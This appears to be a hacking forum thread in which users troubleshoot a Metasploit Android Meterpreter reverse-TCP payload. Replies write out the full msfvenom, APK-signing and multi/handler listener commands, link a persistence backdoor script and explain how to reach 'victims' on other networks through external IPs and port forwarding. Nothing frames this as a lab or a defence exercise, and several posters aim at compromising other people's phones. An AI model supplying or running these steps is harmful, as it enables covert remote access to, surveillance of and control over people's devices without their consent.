Forum Thread: Android Doesn't Connect Back to Metasploit with App Payload?

I am trying to connect my android device to metasploit via reverse tcp, but it never shows up on the console. I have a Nexus 5 running Nethunter and Android 5.1.1

The command I used was: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > base.apk

In my case, 192.168.43.124 is the attacker machine, and 4444 is the default port that Metasploit gave me. From my understanding, the phone's IP isn't important. I have tried this on multiple devices and networks and can't get it to connect.

Do I need to select architecture, or runtime?

18 Responses

If you are using internal IP, devices have to be in one subnet. In other case, you have to set port forwarding.

So what did you do? You connected android device to the network, then installed ap, and created session in msfconsole on atacker's machine?

Pretty Much. Every tutorial I have seen just connects it all like so, and it all seems to work for them.

This might be a redundant question but did you start a listener?

1- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R -t apk -o test.apk_

2- msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.43.124
set LPORT 4444
exploit

Now, you have 5.1.1 and with every update they might have patched something, so don't expect every exploit to work as fine as on older versions. However this is not an exploit per se and bases on a simple outgoing connection. Still, you might have an antivirus or protection software or god knows what on the newest versions ( I didn't upgrade yet so I don't know) so switch any built in or side-app security that could block suspicious connections. The things you specified you've done are correct (assuming the phone is inside the network and that you've set up the handler correctly as HXR ROFO said). Try signing the app with d2j-apk-sign if you have trouble installing it. -Ne-py

Is your phone connected to same wifi as your pc??

Try putting your private ip in your lhost when making the payload...

Also see if the app isnt opening on phone or it is being closed by some other app..

Hi, I supose you found your way round this, but anyway I will share the solution I found for others that can read this:

1) Generate the android payload:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

2) Sign the payload.apk:
# d2j-apk-sign -w base.apk
(This will generate base-signed.apk, change name if desired...)

3) Start Listener:
# msfconsole
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set LHOST 192.168.1.124
> exploit

4) Install apk on your phone.

Remember to delete the app (MainActivity) if the conection fails before you try again...

Even though I managed to get connection, it seams to drop quite fast, some times it hardly connects and drops instantly. I supose this depends on the device as on another old device connection last a bit longer. The only solution I found was to install a persistence script and try to gain connection back by restarting the listener, but still I wonder if there's a way to keep connection alive.

Here is the link from this forum where I saw the persitence script:
https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

(If the script fails delete the "--user 0" option in the script, in my case it worked, but first try as it comes...)

Hope this helps, if I find anything else I will come back to share.

android payload work only same network but outside of network can't work any idea of this problem
# msfvenom -p android/meterpreter/reversetcp LHOST=192.168.43.124 LPORT=4444 R > /root/base.apk

To make an external IP payload you must especify your external IP.

Visit dnsleaktest.com or ipchicken.com for example and copy your external IP.

Then replace your internal IP in the payload:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=EXTERNAL_IP LPORT=4444 R > /root/base.apk

In addition you could redirect the traffic from the 4444 port to your internal IP in the router settings, just to make sure it arrives your machine, I did it, but not sure if we could skip this and still work...

EDIT: I just remebered, if you set the port 4444 on the multi/handler listener in metasploit I really don't think you need to redirect traffic on the router settings, I will give it a try when I get some time.

Here is a nice tutorial on that:

Same here it only get connect while the victim on the same network, how i can get connected to a victim who connect to another wlan ???

Metasploit payload for android in kali linux 2017.3 doesn't work in my redmi note 4 and it stucks in "Starting payload handler". It can't hide itself .Pls tell me what to do?

Same problem here. Phone is in the same network ( mobile hot-spot).

  • If you are using Hotspot to connect your client, then use the proxy like this: 192.168.xx.1
  • If you are using WiFi of another person, who is sharing his internet to you, then use the proxy like this: 192.168.xx.100
  • Proxies can be found by using ifconfig command.

Did anyone solve this.

I have the same problem where the handler is just sitting at:

reverse TCP handler on 0.0.0.0:4444

The app was installed correctly on the device and runs.

Both the Device and MacBook are on the same local network at home.

#Pol_Denais

I also had that problem but there is a simple solution for that the mistake you have made was with "LHOST". You have to set the LHOST of your listener same as your IPv4 other wise this will give error like that, for not getting that error again and again you should bind you "Mac with IP" in you routers setting.

regards Al-Razi

is it even possible to do that i treid a lot of time

Share Your Thoughts

  • Hot
  • Active